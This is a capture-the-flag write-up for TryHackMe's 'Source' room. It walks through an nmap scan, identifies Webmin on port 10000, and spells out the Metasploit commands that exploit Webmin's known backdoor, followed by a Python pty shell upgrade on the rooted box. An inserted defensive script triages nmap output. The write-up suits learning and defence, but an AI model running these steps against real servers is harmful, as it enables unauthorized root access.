
TryHackMe CTF writeup 'Source'

We are tasked with capturing two flags. To accomplish this we need to exploit a vulnerability. It involves a web-based target and backdoor access using Metasploit and Kali Linux. The objectives of this capture-the-flag are to obtain the user flag and the root flag.

Firstly, I spent over half an hour targeting the photo that was displayed on the TryHackMe Capture the Flag room. Needless to say, this photo had no information and was not even part of the game. :)

After embarrassing myself, I started to gather information on the target itself using nmap. 

That is not a commonly used port, so let's dive into it and see what it really is.
We can see it is running an HTTP service named Webmin.

Webmin is a web-based server control panel for many Linux systems. It can be used to configure the operating system and edit the files on it.

We have an IP address and we have a port number, so let's open it in a browser and see what pops up:

> 10.10.226.21:10000

Here you can see I use the nmap command followed by the -oN option, which writes the nmap results to a file named nmapTHM.txt for documentation purposes or later use.

> nmap -sV -sC -Pn -oN nmapTHM.txt 10.10.226.21

Within the nmap results we can see two open ports: port 22 and port 10000. Port 22 being open is very common, as it is SSH and lots of systems use it. But port 10000 is interesting.
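As an added example (not part of the original writeup), here is a small Python script that does the same triage automatically: it parses the normal (-oN) output of an nmap scan like the one saved to nmapTHM.txt, compares the open ports against an expected baseline, and flags an administrative panel such as Webmin that is reachable over the network. The sample scan text is constructed and its version strings are placeholders.

```python
"""Triage nmap normal output (-oN): list open ports and flag anything outside
an expected baseline, the way the writeup singles out port 10000 by hand."""
import re

# Constructed sample in the shape of `nmap -sV -sC -Pn -oN nmapTHM.txt` output.
# Service/version strings are placeholders, not the real scan results.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.10.226.21
Host is up (0.045s latency).
PORT      STATE  SERVICE VERSION
22/tcp    open   ssh     OpenSSH (version placeholder)
10000/tcp open   http    MiniServ (version placeholder) (Webmin httpd)
Service detection performed. Please report any incorrect results.
"""

# One port line of nmap's normal output: "<port>/<proto> <state> <service> [version]"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# What this host is expected to expose; anything else needs a review decision.
EXPECTED_PORTS = {22: "ssh"}
# Banner fragments that identify an administrative interface reachable over the network.
ADMIN_PANEL_MARKERS = ("webmin", "miniserv")


def parse_open_ports(nmap_text):
    """Return one dict per open port: port, proto, service, version."""
    found = []
    for line in nmap_text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m or m.group(3) != "open":
            continue  # header, host lines, closed/filtered ports
        found.append({"port": int(m.group(1)), "proto": m.group(2),
                      "service": m.group(4), "version": m.group(5).strip()})
    return found


def triage(nmap_text):
    """Flag open ports missing from the baseline or exposing an admin panel."""
    findings = []
    for e in parse_open_ports(nmap_text):
        if EXPECTED_PORTS.get(e["port"]) != e["service"]:
            findings.append(f"unexpected: {e['port']}/{e['proto']} {e['service']} {e['version']}".rstrip())
        if any(marker in e["version"].lower() for marker in ADMIN_PANEL_MARKERS):
            findings.append(f"admin panel exposed on {e['port']}: {e['version']}")
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_NMAP_OUTPUT):
        print(finding)
```

Run it against a real nmapTHM.txt by reading the file into `triage()`; every line it prints is a port that should either be in the baseline or be closed or firewalled.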

As you can see, we have a login page. As someone who researches and is learning network administration tools, I can see this being a large red flag for any network's security.

We now have a target. And every system has a vulnerability, whether it has been found yet or not.

This CTF allowed me to research a new tool. We can simply search the internet for vulnerabilities on any given target. I used AttackerKB for the first time and was able to simply type in the version of Webmin and search its current version to see if there are any possible vulnerabilities.

- Using AttackerKB, this is the information I found

I was able to access the information that was posted and it gave me great insight into the current vulnerability. It gave an outline of what the vulnerability was, how it can be manipulated to an attacker's benefit, and how it can be hardened for someone on the defensive side of the network.

This is why it is so important for cybersecurity personnel to also understand how attackers operate. I was also able to access a GitHub page that displayed more information regarding this vulnerability.

With the information we have gathered so far, it is clear that the Webmin version we are attacking has a known backdoor. We are going to use a tool called Metasploit to find and use this backdoor exploit to our advantage as an attacker. Metasploit comes preinstalled in Kali Linux and is launched from the terminal by typing the following command:

> msfconsole

Once it is fully loaded we can type in the following command to search for the Webmin backdoor module.

> search webmin_backdoor

And we get a clear-text listing of the matching modules that we can use.

We see one we can use! Exploit number 0. The next commands are as follows:

> use 0

> show options

We specify that we want to use exploit zero and then show the options that pertain to the attack. We will break them down clearly next.

Now we configure the module and launch the attack. The commands are:

> set RHOSTS 10.10.226.21

> set LHOST YOUR IP

> set SSL true

> run

RHOSTS is the target, LHOST is the IP of the VPN interface we are using, and SSL is set to true. We set it to true because the Webmin service uses SSL (Secure Sockets Layer), the layer that encrypts the data sent between the two systems, so the exploit has to talk to it the same way.

Computers think in yes or no, true or false. By setting SSL to true we are telling Metasploit to make its connection to the target host over SSL.

After a few minutes I received several failed attempts. This was due to my previous command-line inputs: I had not set my LHOST to my IP. You can see this in the several sessions that I previously ran in the picture below.

After fixing this issue, we see proper results and a successful connection!

And we have successfully hacked into the target.

A simple whoami command confirms that we are root:

> whoami

An analogy for root would be the king of a castle. Root makes all the decisions and has all of the privileges. If you own root on a system, you own that system.

At this point I was having problems with connecting to the terminal of this root user.

I used a Python one-liner that imports pty and uses pty.spawn to start /bin/bash. This gave me a terminal emulation that could display any information I wanted to see. The command is below:

> python -c 'import pty; pty.spawn("/bin/bash")'

After this task was completed, I had a full view of all the files on the system. The current task was to collect two flags. They are simply located within the files of this root user. It took no effort at all to locate those flags and complete the challenge.

A key takeaway that I learned from this TryHackMe capture-the-flag was to always update your system, whether manually if you're hosting a small server base, or with tools put in place to automatically scan for out-of-date servers and domains on your network. This is why we update!

This is why the apps on your phone update, and why you get that annoying Windows notification saying that your computer will reboot automatically for an update. It is because the software we use is ever-changing: always adding new security fixes and trying to keep one step ahead of any malicious code, content, viruses, worms, or users that could compromise the system. More on types of cyber threats to come soon! :)